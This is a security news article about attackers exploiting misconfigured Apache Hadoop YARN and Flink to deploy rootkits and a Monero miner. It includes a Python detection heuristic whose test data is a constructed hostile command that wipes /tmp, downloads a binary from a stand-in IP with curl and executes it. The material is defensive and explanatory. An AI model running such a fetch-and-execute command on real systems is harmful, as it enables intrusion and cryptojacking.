Cybersecurity researchers have identified a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners within targeted environments.
“This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes contents of specific directories and modifies system configurations to evade detection.”
The infection chain targeting Hadoop leverages a misconfiguration in YARN’s (Yet Another Resource Negotiator) ResourceManager, which is responsible for managing resources in a cluster and scheduling applications.
Specifically, the misconfiguration can be exploited by an unauthenticated, remote threat actor to execute arbitrary code via a crafted HTTP request, subject to the privileges of the user on the node where the code is executed.
The attacks aimed at Apache Flink, likewise, target a misconfiguration that permits a remote attacker to achieve code execution without any authentication.
These misconfigurations are not novel and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for the purpose of cryptojacking and other malicious activities.
But what makes the latest set of attacks noteworthy is the use of rootkits to hide crypto mining processes after obtaining an initial foothold in Hadoop and Flink applications.
“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run remote code by sending a POST request to the YARN, requesting to launch the new application with the attacker’s command.”
The command is purpose-built to clear the /tmp directory of all existing content, fetch a file called “dca” from a remote server, and execute it, followed by deleting all files in the /tmp directory once again.
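The wipe-fetch-execute-wipe sequence described above is something a defender can look for in the launch commands of applications submitted to YARN. The following heuristic is an added example, not Aqua's detection logic or the attacker's actual command; the sample commands, the `dca` path and the 203.0.113.10 host (a documentation address) are constructed.

```python
import re
import shlex
from typing import List

# Constructed sample launch commands, not the real ones from the campaign.
MALICIOUS_CMD = ("rm -rf /tmp/*; curl -s http://203.0.113.10/dca -o /tmp/dca; "
                 "chmod +x /tmp/dca; /tmp/dca; rm -rf /tmp/*")
BENIGN_CMD = "$JAVA_HOME/bin/java -Xmx1024m org.example.App 1>stdout 2>stderr"

# Split a shell command line into its individual segments (';', '&&', '||', '|').
SEGMENT_SPLIT = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
RECURSIVE_FLAG = re.compile(r"-[a-zA-Z]*r[a-zA-Z]*|--recursive")


def _under_tmp(token: str) -> bool:
    """True for paths in /tmp or relative to the working directory."""
    return token.startswith("/tmp") or token.startswith("./")


def classify(segment: str) -> str:
    """Label one shell segment as wipe_tmp, fetch, exec_tmp or other."""
    try:
        argv = shlex.split(segment)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        argv = segment.split()
    if not argv:
        return "other"
    cmd, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    if cmd == "rm" and any(RECURSIVE_FLAG.fullmatch(a) for a in args) \
            and any(_under_tmp(a) for a in args):
        return "wipe_tmp"
    if cmd in ("curl", "wget"):  # any download inside a YARN launch command is suspect
        return "fetch"
    if _under_tmp(argv[0]) or (cmd in ("sh", "bash", "chmod") and any(_under_tmp(a) for a in args)):
        return "exec_tmp"
    return "other"


def chain_stages(command: str) -> List[str]:
    return [classify(s) for s in SEGMENT_SPLIT.split(command) if s]


def is_fetch_execute_clean(command: str) -> bool:
    """True when a download is followed by execution from /tmp and the
    command also wipes /tmp (the ordering described in the article)."""
    stages = chain_stages(command)
    try:
        stages.index("exec_tmp", stages.index("fetch"))   # execution must follow the download
    except ValueError:
        return False
    return "wipe_tmp" in stages


if __name__ == "__main__":
    for cmd in (MALICIOUS_CMD, BENIGN_CMD):
        print(is_fetch_execute_clean(cmd), chain_stages(cmd))
```

In practice the command text would come from your own cluster's submission records or from process-execution telemetry on the NodeManager hosts, and a hit should be paired with the rootkit and packed-binary detections mentioned in the mitigations.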
The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It’s worth pointing out that various adversaries, including Kinsing, have resorted to using rootkits to conceal the presence of the mining process.
To achieve persistence, a cron job is created to download and execute a shell script that deploys the ‘dca’ binary. Further analysis of the threat actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
As mitigations, it’s recommended that organizations deploy agent-based security solutions to detect cryptominers, rootkits, obfuscated or packed binaries, as well as other suspicious runtime behaviors.